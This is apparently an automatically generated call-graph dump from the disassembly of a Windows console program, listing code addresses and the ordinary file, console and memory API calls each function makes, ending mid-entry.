__EH_prolog 73608->73609 73621 6e6305 73609->73621 73610 71adbf 73610->73494 73612->73494 73616 6d7caf 73613->73616 73615 6d7cdb 73615->73606 73617 6db8ec GetLastError 73615->73617 73616->73615 73618 6d7c68 73616->73618 73617->73606 73619 6d7c79 WriteFile 73618->73619 73620 6d7c76 73618->73620 73619->73616 73620->73619 73622 6e630f __EH_prolog 73621->73622 73658 6e62b9 73622->73658 73625 6e6427 73627 6d965d VariantClear 73625->73627 73626 6e644a 73628 6d965d VariantClear 73626->73628 73650 6e6445 73627->73650 73629 6e646b 73628->73629 73662 6e5126 73629->73662 73634 6e4d78 VariantClear 73635 6e6499 73634->73635 73635->73650 73654 6e64ca 73635->73654 73818 6e5110 9 API calls 73635->73818 73637 6e65de 73638 6e669e 73637->73638 73639 6e65e7 73637->73639 73644 6e66b8 73638->73644 73645 6e6754 73638->73645 73638->73650 73642 6d1e0c ctype 2 API calls 73639->73642 73646 6e65f6 73639->73646 73640 6e64da 73640->73637 73640->73650 73820 6e789c free memmove ctype 73640->73820 73642->73646 73648 6d1e0c ctype 2 API calls 73644->73648 73708 6e5bea 73645->73708 73821 6f36ea 73646->73821 73647 6e666b 73834 6d1e40 free 73647->73834 73648->73650 73650->73610 73651 6e665c 73833 6d31e5 malloc _CxxThrowException free _CxxThrowException 73651->73833 73654->73640 73654->73650 73819 6d42e3 CharUpperW 73654->73819 73659 6e62c9 73658->73659 73835 6f8fa4 73659->73835 73663 6e5130 __EH_prolog 73662->73663 73664 6e51b4 73663->73664 73670 6e518e 73663->73670 73889 6d3097 malloc _CxxThrowException free SysStringLen ctype 73663->73889 73667 6d965d VariantClear 73664->73667 73664->73670 73666 6d965d VariantClear 73668 6e527f 73666->73668 73669 6e51bc 73667->73669 73668->73650 73704 6f8b05 73668->73704 73669->73670 73671 6e5289 73669->73671 73672 6e5206 73669->73672 73670->73666 73671->73670 73674 6e5221 73671->73674 73890 6d3097 malloc _CxxThrowException free SysStringLen ctype 73672->73890 73675 6d965d VariantClear 73674->73675 73676 6e522d 73675->73676 73676->73668 73677 6e5351 73676->73677 73891 6e5459 malloc _CxxThrowException __EH_prolog 73676->73891 73677->73668 73684 6e53a1 73677->73684 73896 6d35e7 memmove 73677->73896 73680 6e52ba 73892 6d8011 5 API calls ctype 73680->73892 73682 6e52cf 73696 6e52fd 73682->73696 73893 6d823d 10 API calls 2 library calls 73682->73893 73684->73668 73897 6d43b7 5 API calls 2 library calls 73684->73897 73687 6e52e5 73688 6d2fec 3 API calls 73687->73688 73690 6e52f5 73688->73690 73689 6e540e 73899 6e789c free memmove ctype 73689->73899 73894 6d1e40 free 73690->73894 73694 6e541c 73697 6f36ea 5 API calls 73694->73697 73695 6e53df 73695->73689 73695->73694 73898 6d42e3 CharUpperW 73695->73898 73895 6e54a0 free ctype 73696->73895 73698 6e5427 73697->73698 73699 6d2fec 3 API calls 73698->73699 73700 6e5433 73699->73700 73900 6d1e40 free 73700->73900 73702 6e543b 73901 702db9 free ctype 73702->73901 73705 6f8b2e 73704->73705 73706 6d965d VariantClear 73705->73706 73707 6e648a 73706->73707 73707->73634 73707->73650 73709 6e5bf4 __EH_prolog 73708->73709 73902 6e54c0 73709->73902 73712 6e5e17 73712->73650 73713 6f8b05 VariantClear 73714 6e5c34 73713->73714 73714->73712 73917 6e5630 73714->73917 73717 6f36ea 5 API calls 73718 6e5c51 73717->73718 73719 6e5c60 73718->73719 74020 6e57c1 53 API calls 2 library calls 73718->74020 73938 6d2f1c 73719->73938 73818->73654 73819->73654 73820->73637 73822 6f36f4 __EH_prolog 73821->73822 73823 6d2e04 2 API calls 73822->73823 73824 6f370a 73823->73824 73825 6f3736 73824->73825 74209 6d1089 malloc _CxxThrowException free _CxxThrowException 73824->74209 74210 6d31e5 malloc _CxxThrowException free _CxxThrowException 73824->74210 73826 6d2f1c 2 API calls 73825->73826 73829 6f3742 73826->73829 74208 6d1e40 free 73829->74208 73831 6e6633 73831->73647 73831->73651 73832 6d1089 malloc _CxxThrowException free _CxxThrowException 73831->73832 73832->73651 73833->73647 73834->73650 73836 6f8fae __EH_prolog 73835->73836 73869 6f7ebb 73836->73869 73842 6f9020 73843 6d2fec 3 API calls 73842->73843 73868 6e6302 73842->73868 73844 6f903a 73843->73844 73854 6f904d 73844->73854 73877 6f8b80 VariantClear 73844->73877 73846 6f917b 73847 6f9244 73846->73847 73848 6f91b0 73846->73848 73888 6d43b7 5 API calls 2 library calls 73847->73888 73886 6f8b9c 10 API calls 2 library calls 73848->73886 73849 6f9144 73849->73846 73880 6d2f88 73849->73880 73853 6f90d6 73855 6f9100 73853->73855 73858 6f90e7 73853->73858 73879 6f8f2e 9 API calls 73853->73879 73854->73849 73854->73853 73854->73855 73854->73868 73878 6d3097 malloc _CxxThrowException free SysStringLen ctype 73854->73878 73856 6d965d VariantClear 73855->73856 73856->73868 73862 6d965d VariantClear 73858->73862 73859 6f91c0 73861 6d2f88 3 API calls 73859->73861 73859->73868 73866 6f91ff 73861->73866 73862->73849 73863 6f9112 73863->73855 73864 6f8b64 VariantClear 73863->73864 73865 6f9123 73864->73865 73865->73855 73865->73858 73866->73868 73887 6d50ff free ctype 73866->73887 73868->73625 73868->73626 73868->73650 73870 6f7ec6 73869->73870 73871 6f7ee4 73869->73871 73870->73871 73872 6d1e40 free ctype 73870->73872 73873 6f8b64 73871->73873 73872->73870 73874 6f8b05 VariantClear 73873->73874 73875 6f8b6f 73874->73875 73875->73868 73876 6f8f2e 9 API calls 73875->73876 73876->73842 73877->73854 73878->73853 73879->73863 73881 6d2f9a 73880->73881 73881->73881 73882 6d2fbe 73881->73882 73883 6d1e0c ctype malloc _CxxThrowException 73881->73883 73882->73846 73884 6d2fb4 73883->73884 73885 6d1e40 ctype free 73884->73885 73885->73882 73886->73859 73887->73868 73888->73868 73889->73664 73890->73674 73891->73680 73892->73682 73893->73687 73894->73696 73895->73677 73896->73677 73897->73695 73898->73695 73899->73694 73900->73702 73901->73668 73903 6e54ca __EH_prolog 73902->73903 73905 6d965d VariantClear 73903->73905 73907 6e5507 73903->73907 73904 6d965d VariantClear 73906 6e5567 73904->73906 73908 6e5528 73905->73908 73906->73712 73906->73713 73907->73904 73908->73907 73909 6e5572 73908->73909 73910 6d965d VariantClear 73909->73910 73911 6e558e 73910->73911 74051 6e4cac VariantClear __EH_prolog 73911->74051 73913 6e55a1 73913->73906 74052 6e4cac VariantClear __EH_prolog 73913->74052 73915 6e55b8 73915->73906 74053 6e4cac VariantClear __EH_prolog 73915->74053 73918 6e563a __EH_prolog 73917->73918 73920 6e5679 73918->73920 74054 6f3558 10 API calls 2 library calls 73918->74054 73921 6d2f1c 2 API calls 73920->73921 73937 6e571a 73920->73937 73922 6e5696 73921->73922 74055 6f3333 malloc _CxxThrowException free 73922->74055 73924 6e56a2 73925 6e56ad 73924->73925 73926 6e56c5 73924->73926 74056 6e7853 5 API calls 2 library calls 73925->74056 73927 6e56b4 73926->73927 74057 6d4adf wcscmp 73926->74057 73930 6e5707 73927->73930 74059 6d1089 malloc _CxxThrowException free _CxxThrowException 73927->74059 74060 6d31e5 malloc _CxxThrowException free _CxxThrowException 73930->74060 73931 6e56d2 73931->73927 74058 6e7853 5 API calls 2 library calls 73931->74058 73937->73717 74062 6d2ba6 73938->74062 74020->73719 74051->73913 74052->73915 74053->73906 74054->73920 74055->73924 74056->73927 74057->73931 74058->73927 74059->73930 74063 6d1e0c ctype malloc _CxxThrowException 74062->74063 74064 6d2bbb 74063->74064 74208->73831 74209->73824 74210->73824 74211 76ffb1 __setusermatherr 74212 76ffbd 74211->74212 74216 770068 _controlfp 74212->74216 74214 76ffc2 _initterm __getmainargs _initterm __p___initenv 74215 70c27c 74214->74215 74216->74214 74217 70adb7 74218 70adc1 __EH_prolog 74217->74218 74233 6d26dd 74218->74233 74220 70ae1d 74221 6d2e04 2 API calls 74220->74221 74222 70ae38 74221->74222 74223 6d2e04 2 API calls 74222->74223 74224 70ae44 74223->74224 74225 6d2e04 2 API calls 74224->74225 74226 70ae68 74225->74226 74236 70ad29 74226->74236 74230 70ae94 74231 6d2e04 2 API calls 74230->74231 74232 70aeb2 74231->74232 74234 6d1e0c ctype 2 API calls 74233->74234 74235 6d26ea 74234->74235 74235->74220 74237 70ad33 __EH_prolog 74236->74237 74238 6d2e04 2 API calls 74237->74238 74239 70ad5f 74238->74239 74240 6d2e04 2 API calls 74239->74240 74241 70ad72 74240->74241 74242 70af2d 74241->74242 74243 70af37 __EH_prolog 74242->74243 74254 6e34f4 malloc _CxxThrowException __EH_prolog 74243->74254 74245 70afac 74246 6d2e04 2 API calls 74245->74246 74247 70afbb 74246->74247 74248 6d2e04 2 API calls 74247->74248 74249 70afca 74248->74249 74250 6d2e04 2 API calls 74249->74250 74251 70afd9 74250->74251 74252 6d2e04 2 API calls 74251->74252 74253 70afe8 74252->74253 74253->74230 74254->74245 74255 70993d 74339 70b5b1 74255->74339 74258 709963 74345 6e1f33 74258->74345 74261 709975 74262 7099ce 74261->74262 74263 7099b7 GetStdHandle GetConsoleScreenBufferInfo 74261->74263 74264 6d1e0c ctype 2 API calls 74262->74264 74263->74262 74265 7099dc 74264->74265 74466 6f7b48 74265->74466 74267 709a29 74495 70b96d _CxxThrowException 74267->74495 74269 709a30 74496 6f7018 8 API calls 2 library calls 74269->74496 74271 709a7c 74497 6fddb5 6 API calls 2 library calls 74271->74497 74273 709a66 _CxxThrowException 74273->74271 74274 709aa6 74275 709aaa _CxxThrowException 74274->74275 74285 709ac0 74274->74285 74275->74285 74276 709a37 74276->74271 74276->74273 74277 709b3a 74501 6d1fa0 fputc 74277->74501 74280 709bfa _CxxThrowException 74289 709be6 74280->74289 74281 709b63 fputs 74502 6d1fa0 fputc 74281->74502 74284 709b79 strlen strlen 74286 709e25 74284->74286 74287 709baa fputs fputc 74284->74287 74285->74277 74285->74280 74498 6f7dd7 7 API calls 2 library calls 74285->74498 74499 70c077 6 API calls 74285->74499 74500 6d1e40 free 74285->74500 74510 6d1fa0 fputc 74286->74510 74287->74289 74289->74286 74289->74287 74296 70b67d 12 API calls 74289->74296 74302 6d2e04 2 API calls 74289->74302 74317 709d2a fputs 74289->74317 74323 709d5f fputs 74289->74323 74324 6d31e5 malloc _CxxThrowException free _CxxThrowException 74289->74324 74503 6d21d8 fputs 74289->74503 74504 6d315e malloc _CxxThrowException free _CxxThrowException 74289->74504 74505 6d3221 malloc _CxxThrowException free _CxxThrowException 74289->74505 74506 6d1089 malloc _CxxThrowException free _CxxThrowException 74289->74506 74508 6d1fa0 fputc 74289->74508 74509 6d1e40 free 74289->74509 74291 709e2c fputs 74511 6d1fa0 fputc 74291->74511 74293 709f0c 74516 6d1fa0 fputc 74293->74516 74296->74289 74297 709f13 fputs 74517 6d1fa0 fputc 74297->74517 74301 709f9f 74303 70ac3a 74301->74303 74304 70ac35 74301->74304 74302->74289 74314 709f29 74314->74301 74327 709f77 fputs 74314->74327 74518 70b650 fputc fputs fputs fputc 74314->74518 74519 70b5e9 fputc fputs 74314->74519 74520 70bde4 fputc fputs 74314->74520 74507 6d21d8 fputs 74317->74507 74323->74289 74324->74289 74521 6d1fa0 fputc 74327->74521 74332 709ee0 fputs 74515 6d1fa0 fputc 74332->74515 74336 709e42 74336->74293 74336->74332 74512 70b650 fputc fputs fputs fputc 74336->74512 74513 6d21d8 fputs 74336->74513 74514 70bde4 fputc fputs 74336->74514 74340 70994a 74339->74340 74341 70b5bc fputs 74339->74341 74340->74258 74483 6d1fb3 74340->74483 74535 6d1fa0 fputc 74341->74535 74343 70b5d5 74343->74340 74344 70b5d9 fputs 74343->74344 74344->74340 74346 6e1f4f 74345->74346 74347 6e1f6c 74345->74347 74578 6f1d73 5 API calls __EH_prolog 74346->74578 74536 6e29eb 74347->74536 74351 6e1f5e _CxxThrowException 74351->74347 74352 6e1fa3 74354 6e1fbc 74352->74354 74356 6d4fc0 5 API calls 74352->74356 74357 6e1fda 74354->74357 74358 6d2fec 3 API calls 74354->74358 74355 6e1f95 _CxxThrowException 74355->74352 74356->74354 74359 6e2022 wcscmp 74357->74359 74367 6e2036 74357->74367 74358->74357 74360 6e20af 74359->74360 74359->74367 74580 6f1d73 5 API calls __EH_prolog 74360->74580 74362 6e20a9 74581 6e393c 6 API calls 2 library calls 74362->74581 74363 6e20be _CxxThrowException 74363->74367 74365 6e20f4 74582 6e393c 6 API calls 2 library calls 74365->74582 74367->74362 74371 6e219a 74367->74371 74368 6e2108 74369 6e2135 74368->74369 74583 6e2e04 62 API calls 2 library calls 74368->74583 74375 6e2159 74369->74375 74584 6e2e04 62 API calls 2 library calls 74369->74584 74585 6f1d73 5 API calls __EH_prolog 74371->74585 74374 6e21a9 _CxxThrowException 74374->74375 74376 6e227f 74375->74376 74378 6e2245 74375->74378 74586 6f1d73 5 API calls __EH_prolog 74375->74586 74541 6e2aa9 74376->74541 74379 6d2fec 3 API calls 74378->74379 74382 6e225c 74379->74382 74382->74376 74587 6f1d73 5 API calls __EH_prolog 74382->74587 74383 6e22d9 74386 6e2302 74383->74386 74388 6d2fec 3 API calls 74383->74388 74384 6e2237 _CxxThrowException 74384->74378 74385 6d2fec 3 API calls 74385->74383 74559 6d4fc0 74386->74559 74388->74386 74391 6e2271 _CxxThrowException 74391->74376 74393 6e2322 74395 6e26c6 74393->74395 74402 6e23a1 74393->74402 74394 6e28ce 74396 6e293a 74394->74396 74408 6e28d5 74394->74408 74395->74394 74397 6e2700 74395->74397 74600 6f1d73 5 API calls __EH_prolog 74395->74600 74400 6e293f 74396->74400 74401 6e29a5 74396->74401 74601 6e32ec 14 API calls 2 library calls 74397->74601 74618 6d4eec 16 API calls 74400->74618 74404 6e29ae _CxxThrowException 74401->74404 74422 6e264d 74401->74422 74411 6e247a wcscmp 74402->74411 74428 6e248e 74402->74428 74403 6e26f2 _CxxThrowException 74403->74397 74405 6e2713 74602 6e3a29 74405->74602 74408->74422 74617 6f1d73 5 API calls __EH_prolog 74408->74617 74410 6e294c 74619 6d4ea1 8 API calls 74410->74619 74413 6e24cf wcscmp 74411->74413 74411->74428 74416 6e24ef wcscmp 74413->74416 74413->74428 74419 6e250f 74416->74419 74416->74428 74417 6e2953 74420 6d4fc0 5 API calls 74417->74420 74418 6e2920 _CxxThrowException 74418->74422 74591 6f1d73 5 API calls __EH_prolog 74419->74591 74420->74422 74422->74261 74424 6e27cf 74429 6e2880 74424->74429 74442 6e281f 74424->74442 74613 6f1d73 5 API calls __EH_prolog 74424->74613 74425 6e251e _CxxThrowException 74426 6e252c 74425->74426 74430 6e2569 74426->74430 74592 6e2e04 62 API calls 2 library calls 74426->74592 74427 6d2fec 3 API calls 74431 6e27a9 74427->74431 74428->74426 74588 6d4eec 16 API calls 74428->74588 74589 6d4ea1 8 API calls 74428->74589 74590 6f1d73 5 API calls __EH_prolog 74428->74590 74434 6d2fec 3 API calls 74429->74434 74441 6e289b 74429->74441 74439 6e258c 74430->74439 74593 6e2e04 62 API calls 2 library calls 74430->74593 74431->74424 74612 6d3563 memmove 74431->74612 74434->74441 74435 6e24c1 _CxxThrowException 74435->74413 74438 6e25a4 74595 6d4eec 16 API calls 74438->74595 74439->74438 74594 6e2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74439->74594 74440 6e2811 _CxxThrowException 74440->74442 74441->74422 74616 6f1d73 5 API calls __EH_prolog 74441->74616 74442->74429 74443 6e2847 74442->74443 74614 6f1d73 5 API calls __EH_prolog 74442->74614 74443->74429 74615 6f1d73 5 API calls __EH_prolog 74443->74615 74449 6e2839 _CxxThrowException 74449->74443 74451 6e25ad 74596 6f1b07 49 API calls 74451->74596 74452 6e28c0 _CxxThrowException 74452->74394 74453 6e2872 _CxxThrowException 74453->74429 74455 6e25b4 74597 6d4ea1 8 API calls 74455->74597 74457 6e25bb 74458 6d2fec 3 API calls 74457->74458 74460 6e25d6 74457->74460 74458->74460 74459 6e261f 74459->74422 74462 6d2fec 3 API calls 74459->74462 74460->74422 74460->74459 74598 6f1d73 5 API calls __EH_prolog 74460->74598 74464 6e263f 74462->74464 74463 6e2611 _CxxThrowException 74463->74459 74599 6d859e malloc _CxxThrowException free _CxxThrowException 74464->74599 74467 6f7b52 __EH_prolog 74466->74467 74645 6f7eec 74467->74645 74469 6f7b63 74471 6f7ca4 74469->74471 74472 6d2e04 malloc _CxxThrowException 74469->74472 74473 6d30ea malloc _CxxThrowException free 74469->74473 74475 6d1e40 free ctype 74469->74475 74477 7104d2 5 API calls 74469->74477 74479 6d429a 3 API calls 74469->74479 74481 6f7c61 memcpy 74469->74481 74650 6f70ea 74469->74650 74653 6f7a40 74469->74653 74671 6f7cc3 6 API calls 74469->74671 74672 6e12a5 74469->74672 74677 6f74eb malloc _CxxThrowException memcpy __EH_prolog ctype 74469->74677 74678 6f7193 74469->74678 74471->74267 74472->74469 74473->74469 74475->74469 74477->74469 74479->74469 74481->74469 74484 6d1fbd __EH_prolog 74483->74484 74485 6d26dd 2 API calls 74484->74485 74486 6d1fcb 74485->74486 74695 6d2e47 74486->74695 74490 6d1fed 74702 6d1e40 free 74490->74702 74492 6d1ff5 74703 6d1e40 free 74492->74703 74494 6d1ffd 74494->74258 74495->74269 74496->74276 74497->74274 74498->74285 74499->74285 74500->74285 74501->74281 74502->74284 74503->74289 74504->74289 74505->74289 74506->74289 74507->74289 74508->74289 74509->74289 74510->74291 74511->74336 74512->74336 74513->74336 74514->74336 74515->74336 74516->74297 74517->74314 74518->74314 74519->74314 74520->74314 74521->74314 74535->74343 74537 6d2f1c 2 API calls 74536->74537 74540 6e29fe 74537->74540 74539 6e1f7e 74539->74352 74579 6f1d73 5 API calls __EH_prolog 74539->74579 74620 6d1e40 free 74540->74620 74542 6e2ab3 __EH_prolog 74541->74542 74552 6e2b0f 74542->74552 74621 6d2e8a 74542->74621 74544 6e22ad 74544->74383 74544->74385 74547 6e2b04 74626 6d1e40 free 74547->74626 74548 6e2bc6 74631 6f1d73 5 API calls __EH_prolog 74548->74631 74551 6e2bd6 _CxxThrowException 74551->74544 74552->74544 74552->74548 74556 6e2b9f 74552->74556 74627 6e2cb4 48 API calls 2 library calls 74552->74627 74628 6e2bf5 8 API calls __EH_prolog 74552->74628 74629 6e2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74552->74629 74556->74544 74630 6f1d73 5 API calls __EH_prolog 74556->74630 74558 6e2bb8 _CxxThrowException 74558->74548 74560 6d4fce 74559->74560 74561 6d4fd2 74559->74561 74569 6e384c 74560->74569 74562 6f7ebb free 74561->74562 74563 6d4fd9 74562->74563 74564 6d4ffe 74563->74564 74565 6d4fe9 _CxxThrowException 74563->74565 74568 6d5006 74563->74568 74632 710551 malloc _CxxThrowException free memcpy ctype 74564->74632 74565->74564 74568->74560 74633 6d1524 malloc _CxxThrowException __EH_prolog ctype 74568->74633 74575 6e3856 __EH_prolog 74569->74575 74570 6d2e04 malloc _CxxThrowException 74570->74575 74571 6d2fec 3 API calls 74571->74575 74572 6d2f88 3 API calls 74572->74575 74575->74570 74575->74571 74575->74572 74576 6d1e40 free ctype 74575->74576 74577 6e3917 74575->74577 74634 7104d2 74575->74634 74640 6e3b76 malloc _CxxThrowException __EH_prolog ctype 74575->74640 74576->74575 74577->74393 74578->74351 74579->74355 74580->74363 74581->74365 74582->74368 74583->74369 74584->74375 74585->74374 74586->74384 74587->74391 74588->74428 74589->74428 74590->74435 74591->74425 74592->74430 74593->74439 74594->74438 74595->74451 74596->74455 74597->74457 74598->74463 74599->74422 74600->74403 74601->74405 74603 6e3a3b 74602->74603 74608 6e2722 74602->74608 74642 6e3bd9 free ctype 74603->74642 74605 6e3a42 74606 6e3a67 74605->74606 74607 6e3a52 _CxxThrowException 74605->74607 74609 6e3a6f 74605->74609 74643 710551 malloc _CxxThrowException free memcpy ctype 74606->74643 74607->74606 74608->74424 74608->74427 74609->74608 74644 6e3b76 malloc _CxxThrowException __EH_prolog ctype 74609->74644 74612->74424 74613->74440 74614->74449 74615->74453 74616->74452 74617->74418 74618->74410 74619->74417 74620->74539 74622 6d2ea0 74621->74622 74623 6d2ba6 2 API calls 74622->74623 74624 6d2eaf 74623->74624 74625 6e2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74624->74625 74625->74547 74626->74552 74627->74552 74628->74552 74629->74552 74630->74558 74631->74551 74632->74568 74633->74568 74635 710513 74634->74635 74636 7104df 74634->74636 74635->74575 74637 7104e8 _CxxThrowException 74636->74637 74638 7104fd 74636->74638 74637->74638 74641 710551 malloc _CxxThrowException free memcpy ctype 74638->74641 74640->74575 74641->74635 74642->74605 74643->74609 74644->74609 74646 6f7f14 74645->74646 74648 6f7ef7 74645->74648 74646->74469 74647 6f7193 free 74647->74648 74648->74646 74648->74647 74686 6d1e40 free 74648->74686 74651 6d2e04 2 API calls 74650->74651 74652 6f7103 74651->74652 74652->74469 74654 6f7a4a __EH_prolog 74653->74654 74687 6d361b 6 API calls 2 library calls 74654->74687 74656 6f7a78 74688 6d361b 6 API calls 2 library calls 74656->74688 74658 6f7b20 74690 702db9 free ctype 74658->74690 74660 6d2e04 malloc _CxxThrowException 74670 6f7a83 74660->74670 74661 6f7b2b 74691 702db9 free ctype 74661->74691 74663 6f7b37 74663->74469 74664 6d2fec 3 API calls 74664->74670 74665 7104d2 5 API calls 74665->74670 74666 6d2fec 3 API calls 74667 6f7aca wcscmp 74666->74667 74667->74670 74669 6d1e40 free ctype 74669->74670 74670->74658 74670->74660 74670->74664 74670->74665 74670->74666 74670->74669 74689 6f7955 malloc _CxxThrowException __EH_prolog ctype 74670->74689 74671->74469 74673 7104d2 5 API calls 74672->74673 74674 6e12ad 74673->74674 74675 6d1e0c ctype 2 API calls 74674->74675 74676 6e12b4 74675->74676 74676->74469 74677->74469 74679 6f719d __EH_prolog 74678->74679 74692 702db9 free ctype 74679->74692 74681 6f71b3 74693 6f71d5 free __EH_prolog ctype 74681->74693 74683 6f71bf 74694 6d1e40 free 74683->74694 74685 6f71c7 74685->74469 74686->74648 74687->74656 74688->74670 74689->74670 74690->74661 74691->74663 74692->74681 74693->74683 74694->74685 74696 6d2e57 74695->74696 74697 6d2ba6 2 API calls 74696->74697 74698 6d1fda 74697->74698 74699 6d2010 74698->74699 74700 6d2033 10 API calls 74699->74700 74701 6d2022 fputs 74700->74701 74701->74490 74702->74492 74703->74494 74706 6d7b20 74709 6d7ab2 74706->74709 74710 6d7ac5 74709->74710 74717 6d759a 74710->74717 74713 6d7aeb SetFileTime 74714 6d7b03 74713->74714 74731 6d7919 74714->74731 74718 6d75a4 __EH_prolog 74717->74718 74747 6d764c 74718->74747 74720 6d7632 74720->74713 74720->74714 74721 6d75af 74721->74720 74722 6d75e9 74721->74722 74723 6d75d4 CreateFileW 74721->74723 74722->74720 74724 6d2e04 2 API calls 74722->74724 74723->74722 74725 6d75fb 74724->74725 74750 6d8b4a 74725->74750 74727 6d7611 74728 6d762a 74727->74728 74729 6d7615 CreateFileW 74727->74729 74755 6d1e40 free 74728->74755 74729->74728 74732 6d7aac 74731->74732 74733 6d793c 74731->74733 74733->74732 74734 6d7945 DeviceIoControl 74733->74734 74735 6d79e6 74734->74735 74739 6d7969 74734->74739 74736 6d79ef DeviceIoControl 74735->74736 74745 6d7a14 74735->74745 74737 6d7a22 DeviceIoControl 74736->74737 74736->74745 74738 6d7a44 DeviceIoControl 74737->74738 74737->74745 74738->74745 74739->74735 74741 6d79a7 74739->74741 74873 6d9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 74741->74873 74742 6d7aa5 74744 6d77de 5 API calls 74742->74744 74744->74732 74745->74732 74874 6d780d 8 API calls ctype 74745->74874 74746 6d79d0 74746->74735 74748 6d7656 CloseHandle 74747->74748 74749 6d7661 74747->74749 74748->74749 74749->74721 74756 6d8b80 74750->74756 74752 6d8b6e 74752->74727 74754 6d2f88 3 API calls 74754->74752 74755->74720 74757 6d8b8a __EH_prolog 74756->74757 74758 6d8c7b 74757->74758 74764 6d8be1 74757->74764 74803 6d8b55 74757->74803 74759 6d8d23 74758->74759 74761 6d8c8f 74758->74761 74760 6d8e8a 74759->74760 74763 6d8d3b 74759->74763 74762 6d2e47 2 API calls 74760->74762 74761->74763 74769 6d8c9e 74761->74769 74765 6d8e96 74762->74765 74766 6d2e04 2 API calls 74763->74766 74767 6d2e47 2 API calls 74764->74767 74764->74803 74773 6d2e47 2 API calls 74765->74773 74768 6d8d43 74766->74768 74770 6d8c05 74767->74770 74853 6d6332 6 API calls 2 library calls 74768->74853 74772 6d2e47 2 API calls 74769->74772 74776 6d8c24 74770->74776 74777 6d8c17 74770->74777 74781 6d8ca7 74772->74781 74775 6d8eb8 74773->74775 74774 6d8d52 74837 6d8d56 74774->74837 74854 6d859e malloc _CxxThrowException free _CxxThrowException 74774->74854 74865 6d8f57 memmove 74775->74865 74784 6d2e47 2 API calls 74776->74784 74843 6d1e40 free 74777->74843 74785 6d2e47 2 API calls 74781->74785 74783 6d8ec4 74786 6d8ede 74783->74786 74787 6d8ec8 74783->74787 74788 6d8c35 74784->74788 74790 6d8cd0 74785->74790 74868 6d3221 malloc _CxxThrowException free _CxxThrowException 74786->74868 74866 6d1e40 free 74787->74866 74844 6d8f57 memmove 74788->74844 74848 6d8f57 memmove 74790->74848 74793 6d8eeb 74869 6d31e5 malloc _CxxThrowException free _CxxThrowException 74793->74869 74795 6d8ed0 74867 6d1e40 free 74795->74867 74796 6d8c41 74797 6d8c6b 74796->74797 74845 6d31e5 malloc _CxxThrowException free _CxxThrowException 74796->74845 74847 6d1e40 free 74797->74847 74798 6d8cdc 74802 6d8d13 74798->74802 74849 6d3221 malloc _CxxThrowException free _CxxThrowException 74798->74849 74852 6d1e40 free 74802->74852 74803->74752 74803->74754 74806 6d8f06 74870 6d31e5 malloc _CxxThrowException free _CxxThrowException 74806->74870 74807 6d8c73 74872 6d1e40 free 74807->74872 74809 6d2e04 2 API calls 74813 6d8ddf 74809->74813 74810 6d8c60 74846 6d31e5 malloc _CxxThrowException free _CxxThrowException 74810->74846 74812 6d8ced 74850 6d31e5 malloc _CxxThrowException free _CxxThrowException 74812->74850 74817 6d8e0e 74813->74817 74820 6d8df1 74813->74820 74815 6d8f11 74871 6d1e40 free 74815->74871 74821 6d2f88 3 API calls 74817->74821 74855 6d3199 malloc _CxxThrowException free _CxxThrowException 74820->74855 74826 6d8e0c 74821->74826 74822 6d8d65 74822->74809 74822->74837 74823 6d8d08 74851 6d31e5 malloc _CxxThrowException free _CxxThrowException 74823->74851 74857 6d8f57 memmove 74826->74857 74827 6d8e03 74856 6d3199 malloc _CxxThrowException free _CxxThrowException 74827->74856 74830 6d8e22 74831 6d8e26 74830->74831 74832 6d8e3b 74830->74832 74858 6d3221 malloc _CxxThrowException free _CxxThrowException 74830->74858 74863 6d1e40 free 74831->74863 74859 6d8f34 malloc _CxxThrowException 74832->74859 74836 6d8e49 74860 6d31e5 malloc _CxxThrowException free _CxxThrowException 74836->74860 74864 6d1e40 free 74837->74864 74839 6d8e56 74861 6d1e40 free 74839->74861 74841 6d8e62 74862 6d31e5 malloc _CxxThrowException free _CxxThrowException 74841->74862 74843->74803 74844->74796 74845->74810 74846->74797 74847->74807 74848->74798 74849->74812 74850->74823 74851->74802 74852->74807 74853->74774 74854->74822 74855->74827 74856->74826 74857->74830 74858->74832 74859->74836 74860->74839 74861->74841 74862->74831 74863->74837 74864->74803 74865->74783 74866->74795 74867->74803 74868->74793 74869->74806 74870->74815 74871->74807 74872->74803 74873->74746 74874->74742 74875 6dc3bd 74876 6dc3ca 74875->74876 74878 6dc3db 74875->74878 74876->74878 74879 6d1e40 free 74876->74879 74879->74878 74880 6fcefb 74881 6fd0cc 74880->74881 74882 6fcf03 74880->74882 74882->74881 74927 6fcae9 VariantClear 74882->74927 74884 6fcf59 74884->74881 74928 6fcae9 VariantClear 74884->74928 74886 6fcf71 74886->74881 74929 6fcae9 VariantClear 74886->74929 74888 6fcf87 74888->74881 74930 6fcae9 VariantClear 74888->74930 74890 6fcf9d 74890->74881 74931 6fcae9 VariantClear 74890->74931 74892 6fcfb3 74892->74881 74932 6fcae9 VariantClear 74892->74932 74894 6fcfc9 74894->74881 74933 6d4504 malloc _CxxThrowException 74894->74933 74896 6fcfdc 74897 6d2e04 2 API calls 74896->74897 74899 6fcfe7 74897->74899 74898 6fd009 74900 6fd07b 74898->74900 74902 6fd080 74898->74902 74903 6fd030 74898->74903 74899->74898 74901 6d2f88 3 API calls 74899->74901 74941 6d1e40 free 74900->74941 74901->74898 74938 6f7a0c CharUpperW 74902->74938 74906 6d2e04 2 API calls 74903->74906 74909 6fd038 74906->74909 74907 6fd0c4 74942 6d1e40 free 74907->74942 74908 6fd08b 74939 6efdbc 4 API calls 2 library calls 74908->74939 74911 6d2e04 2 API calls 74909->74911 74913 6fd046 74911->74913 74934 6efdbc 4 API calls 2 library calls 74913->74934 74914 6fd0a7 74916 6d2fec 3 API calls 74914->74916 74918 6fd0b3 74916->74918 74917 6fd057 74919 6d2fec 3 API calls 74917->74919 74940 6d1e40 free 74918->74940 74921 6fd063 74919->74921 74935 6d1e40 free 74921->74935 74923 6fd06b 74936 6d1e40 free 74923->74936 74925 6fd073 74937 6d1e40 free 74925->74937 74927->74884 74928->74886 74929->74888 74930->74890 74931->74892 74932->74894 74933->74896 74934->74917 74935->74923 74936->74925 74937->74900 74938->74908 74939->74914 74940->74900 74941->74907 74942->74881 74943 70c2e6 74944 70c52f 74943->74944 74947 70544f SetConsoleCtrlHandler 74944->74947 74946 70c53b 74947->74946 74948 71bf67 74949 71bf74 74948->74949 74950 71bf85 74948->74950 74949->74950 74954 71bf8c 74949->74954 74955 71bf96 __EH_prolog 74954->74955 74971 71d144 74955->74971 74959 